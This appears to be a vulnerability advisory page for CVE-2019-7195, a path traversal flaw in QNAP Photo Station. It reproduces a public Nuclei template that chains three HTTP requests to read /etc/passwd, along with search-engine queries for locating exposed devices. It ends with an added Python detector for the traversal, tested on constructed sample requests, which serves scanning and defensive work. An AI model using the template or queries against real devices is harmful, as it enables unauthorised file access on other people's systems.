CVE-2019-7195: QNAP Photo Station - Path Traversal

Date: 2025-08-01 | Affected software: QNAP Photo Station | PoC: public

Vulnerability description

QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.

PoC code [public]

id: CVE-2019-7195

info:
  name: QNAP Photo Station - Path Traversal
  author: s4e-io
  severity: critical
  description: |
    QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
  reference:
    - https://cycrafttechnology.medium.com/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
    - https://packetstorm.news/files/id/157857
    - https://github.com/cycraft-corp/cve-2019-7192-check
    - https://github.com/qazbnm456/awesome-cve-poc
    - https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7195
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7195
    cwe-id: CWE-22
    epss-score: 0.93427
    epss-percentile: 0.99817
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    vendor: qnap
    product: photo_station
    shodan-query:
      - content-length:"580 "http server 1.0""
      - http.title:"photo station"
      - http.title:"qnap"
    fofa-query:
      - title="photo station"
      - title="qnap"
    google-query:
      - intitle:"photo station"
      - intitle:"qnap"
  tags: cve,cve2019,kev,qnap,lfi

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f={{to_lower(rand_text_alpha(5))}}

      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers:
      - type: dsl
        dsl:
          - "status_code_3 == 200"
          - "regex('admin:', body_3)"
          - "contains_all(header_3, 'video/subtitle', 'filename=')"
        condition: and

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 490a00463044022020867e3e26a3e11a20b231b8a46d0ef3d11d5d5cb057fa06b0a21a67138df95d02207e0150b4a9aa6e7f0504ed442ae4b1170b2f30165314f0d0b52b964687ff0369:922c64590222798bb761d5b6d8e72950
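
Defender-side request check for the traversal the template exercises on /photo/p/api/video.php, added here as an example; it is not part of the page's Nuclei template or of QNAP's code. It assumes requests are available as (method, target, body) tuples, e.g. from a reverse-proxy hook or full request logs, and runs over constructed sample requests.

```python
"""Flag CVE-2019-7195-style caption requests whose filename escapes the album directory."""
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

VIDEO_API = "/photo/p/api/video.php"  # endpoint where the template's traversal lands

def _fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %252e%252e%252f is seen as ../ too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_parent_hop(value: str) -> bool:
    """True when the decoded value contains a '..' path segment (either slash style)."""
    segments = _fully_decode(value).replace("\\", "/").split("/")
    return ".." in segments

def check_photo_station_request(method: str, target: str, body: str = "") -> Optional[str]:
    """Return a finding for a suspicious Photo Station caption request, else None.
    Query and urlencoded body are merged because the template sends the parameters
    in a POST body, while proxies or logs may expose them in either place."""
    url = urlsplit(target)
    if url.path != VIDEO_API:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if body:
        params.update(parse_qs(body, keep_blank_values=True))
    filename = params.get("filename", [""])[0]
    if params.get("a", [""])[0] == "caption" and has_parent_hop(filename):
        return f"CVE-2019-7195 traversal attempt: {method} {VIDEO_API} filename={_fully_decode(filename)!r}"
    return None

# Constructed sample requests (not captured traffic): the template's chain, a
# double-encoded variant, and a benign subtitle request.
SAMPLE_REQUESTS = [
    ("POST", "/photo/p/api/album.php", "a=setSlideshow&f=abcde"),
    ("POST", VIDEO_API, "album=AbCdE&a=caption&ac=Xy9&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"),
    ("GET", VIDEO_API + "?album=AbCdE&a=caption&ac=Xy9&f=k&filename=%252e%252e%252fetc%252fpasswd", ""),
    ("POST", VIDEO_API, "album=AbCdE&a=caption&ac=Xy9&f=k&filename=movie.srt"),
]

def scan(requests=SAMPLE_REQUESTS) -> list:
    """Run the check over a batch of requests and return only the findings."""
    return [f for f in (check_photo_station_request(*r) for r in requests) if f]

if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

Access logs alone will not show the POST-body form of the request; the check needs request-body visibility at the proxy or application layer to cover the chain as the template sends it.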
